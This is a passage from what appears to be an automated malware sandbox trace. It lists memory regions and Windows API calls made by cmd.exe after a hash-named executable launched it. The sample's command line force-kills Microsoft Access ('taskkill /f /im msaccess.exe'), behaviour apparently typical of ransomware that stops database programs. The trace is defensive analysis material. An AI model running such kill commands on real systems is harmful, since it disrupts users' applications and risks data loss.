"\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4529 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4530 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4531 start_va = 0x400000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4532 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4533 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4534 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4535 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4536 start_va = 0x5b0000 end_va = 0x66dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4537 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4538 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4539 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4540 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4541 start_va = 0x770000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 4542 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4543 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4544 start_va = 0x930000 end_va = 0xc66fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 332 os_tid = 0x6f8 [0207.914] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0207.914] __set_app_type (_Type=0x1) [0207.914] __p__fmode () returned 0x74974d6c [0207.914] __p__commode () returned 0x74975b1c [0207.915] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0207.915] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0207.915] GetCurrentThreadId () returned 0x6f8 [0207.915] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6f8) returned 0x78 [0207.915] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0207.915] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0207.941] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.953] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0207.954] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.954] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.954] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.954] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.954] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0207.954] GetConsoleOutputCP () returned 0x1b5 [0207.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0207.956] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0207.956] _get_osfhandle (_FileHandle=1) returned 0x144 [0207.956] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0207.956] _get_osfhandle (_FileHandle=1) returned 0x144 [0207.956] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0207.956] _get_osfhandle (_FileHandle=0) returned 0x140 [0207.956] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0207.959] GetEnvironmentStringsW () returned 0x477d08* [0207.959] GetProcessHeap () returned 0x470000 [0207.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x478730 [0207.959] FreeEnvironmentStringsA (penv="A") returned 1 [0207.959] GetProcessHeap () returned 0x470000 [0207.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x470588 [0207.959] GetEnvironmentStringsW () returned 0x477d08* [0207.959] GetProcessHeap () returned 0x470000 [0207.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x479158 [0207.960] FreeEnvironmentStringsA (penv="A") returned 1 [0207.960] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.960] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.960] RegCloseKey (hKey=0x88) returned 0x0 [0207.960] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0207.961] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0207.961] RegCloseKey (hKey=0x88) returned 0x0 [0207.961] time (in: timer=0x0 | out: timer=0x0) returned 0x6234423e [0207.961] srand (_Seed=0x6234423e) [0207.961] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im msaccess.exe \"" [0207.961] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im msaccess.exe \"" [0207.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0207.961] GetProcessHeap () returned 0x470000 [0207.961] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x479b80 [0207.961] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x479b88, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0207.962] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0207.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0207.962] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.962] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.962] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.962] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.962] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.962] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.962] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.962] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.962] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.962] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.962] GetProcessHeap () returned 0x470000 [0207.963] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x478730) returned 1 [0207.963] GetEnvironmentStringsW () returned 0x477d08* [0207.963] GetProcessHeap () returned 0x470000 [0207.963] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa32) returned 0x47a7d8 [0207.963] FreeEnvironmentStringsA (penv="A") returned 1 [0207.963] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0207.963] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.963] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.963] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.963] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.963] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.963] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.964] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.964] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.964] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.964] GetProcessHeap () returned 0x470000 [0207.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x474140 [0207.964] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0207.964] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0207.964] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0207.964] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4705c8 [0207.964] FindClose (in: hFindFile=0x4705c8 | out: hFindFile=0x4705c8) returned 1 [0207.965] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4705c8 [0207.965] FindClose (in: hFindFile=0x4705c8 | out: hFindFile=0x4705c8) returned 1 [0207.965] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0207.965] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4705c8 [0207.965] FindClose (in: hFindFile=0x4705c8 | out: hFindFile=0x4705c8) returned 1 [0207.965] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0207.965] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0207.965] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0207.965] GetProcessHeap () returned 0x470000 [0207.966] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a7d8) returned 1 [0207.966] GetEnvironmentStringsW () returned 0x477d08* [0207.966] GetProcessHeap () returned 0x470000 [0207.966] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x479d98 [0207.966] FreeEnvironmentStringsA (penv="=") returned 1 [0207.966] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0207.966] GetProcessHeap () returned 0x470000 [0207.966] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x474140) returned 1 [0207.967] GetProcessHeap () returned 0x470000 [0207.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x47bc98 [0207.967] GetProcessHeap () returned 0x470000 [0207.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x474140 [0207.967] GetProcessHeap () returned 0x470000 [0207.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x47fcb0 [0207.968] GetProcessHeap () returned 0x470000 [0207.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x483cc0 [0207.969] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0207.970] GetProcessHeap () returned 0x470000 [0207.970] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x47a818 [0207.970] SetErrorMode (uMode=0x0) returned 0x8003 [0207.970] SetErrorMode (uMode=0x1) returned 0x0 [0207.970] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x47a820, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0207.970] SetErrorMode (uMode=0x8003) returned 0x1 [0207.970] GetProcessHeap () returned 0x470000 [0207.970] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a818, Size=0x7e) returned 0x47a818 [0207.970] GetProcessHeap () returned 0x470000 [0207.970] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a818) returned 0x7e [0207.970] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0207.970] GetProcessHeap () returned 0x470000 [0207.970] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x47a8a0 [0207.970] GetProcessHeap () returned 0x470000 [0207.970] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb8) returned 0x47a910 [0207.971] GetProcessHeap () returned 0x470000 [0207.971] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a910, Size=0x62) returned 0x47a910 [0207.971] GetProcessHeap () returned 0x470000 [0207.971] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a910) returned 0x62 [0207.971] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0207.971] GetProcessHeap () returned 0x470000 [0207.971] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47a980 [0207.976] GetProcessHeap () returned 0x470000 [0207.976] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a980, Size=0x76) returned 0x47a980 [0207.976] GetProcessHeap () returned 0x470000 [0207.976] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a980) returned 0x76 [0207.976] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.976] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im msaccess.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0207.977] GetLastError () returned 0x3 [0207.977] GetProcessHeap () returned 0x470000 [0207.977] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47fcb0) returned 1 [0207.978] GetProcessHeap () returned 0x470000 [0207.978] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x483cc0) returned 1 [0207.979] GetProcessHeap () returned 0x470000 [0207.979] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc98) returned 1 [0207.980] GetConsoleOutputCP () returned 0x1b5 [0207.987] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0207.987] GetUserDefaultLCID () returned 0x409 [0207.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0207.989] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0207.989] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.992] GetProcessHeap () returned 0x470000 [0207.992] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x47aa48 [0207.992] GetConsoleTitleW (in: lpConsoleTitle=0x47aa48, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0208.072] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0208.072] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0208.072] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0208.072] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0208.073] GetProcessHeap () returned 0x470000 [0208.073] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x47bc98 [0208.073] GetProcessHeap () returned 0x470000 [0208.074] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc98) returned 1 [0208.074] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0208.075] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0208.075] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0208.075] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0208.075] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0208.075] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0208.075] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0208.075] GetProcessHeap () returned 0x470000 [0208.075] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x47ac60 [0208.075] GetProcessHeap () returned 0x470000 [0208.075] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x47acc0 [0208.076] GetProcessHeap () returned 0x470000 [0208.076] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x34) returned 0x47ace8 [0208.076] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0208.084] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0208.084] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0208.084] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0208.084] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0208.084] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0208.084] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0208.084] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0208.084] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0208.085] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0208.085] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0208.085] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0208.085] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0208.085] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0208.085] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0208.085] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0208.085] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0208.085] 